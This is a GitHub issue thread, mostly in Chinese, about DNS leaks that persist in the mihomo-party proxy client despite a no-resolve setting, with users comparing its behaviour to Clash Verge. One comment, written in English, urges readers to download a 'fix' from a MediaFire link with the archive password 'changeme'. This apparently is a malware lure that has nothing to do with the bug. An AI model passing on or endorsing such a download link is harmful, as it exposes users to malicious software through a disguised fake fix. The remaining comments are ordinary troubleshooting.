### ISSUE TITLE
[Bug] 防止DNS泄露配置未生效

### ISSUE THREAD

**Issue by hubumulity** [pompurin404/mihomo-party#97]
### Verify steps

- [X] 我已在标题简短的描述了我所遇到的问题
- [X] 我未在[Issue Tracker](./?q=is%3Aissue)中找到我要提出的问题
- [X] 我未在[常见问题](https://mihomo.party/guides/issue/general/)中找到我要提出的问题
- [X] 这是GUI程序的问题,而不是内核程序的问题
- [X] 我已经使用最新的测试版本测试过，问题依旧存在

### 操作系统

Windows

### 系统版本

11

### 发生问题 mihomo-party 版本

1.0.8

### 描述

我在yaml配置文件中添加了no-resolve的防止DNS泄露配置，在其他GUI客户端都可以正常工作，但是party在ipleak的检测中发现了dns泄露。

### 重现方式

启动party，访问ipleak网站，发现有国内的dns请求

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ghost** [comment]
啥也没有，排查不了

**Comment by hubumulity** [comment]
打开连接遵守规则好了

**Comment by sdgsgsdf** [comment]
> 打开连接遵守规则好了

大佬你怎么写的哇，给clash-verge用的，似乎不行

**Comment by acstor** [comment]
同樣的 JS，爲什麽 Clash Verge DNS 不會泄露，Mihomo Party 會？

**Comment by sdgsgsdf** [comment]
> 同樣的 JS，爲什麽 Clash Verge DNS 不會泄露，Mihomo Party 會？

+1，verge用的在mihomo就不行
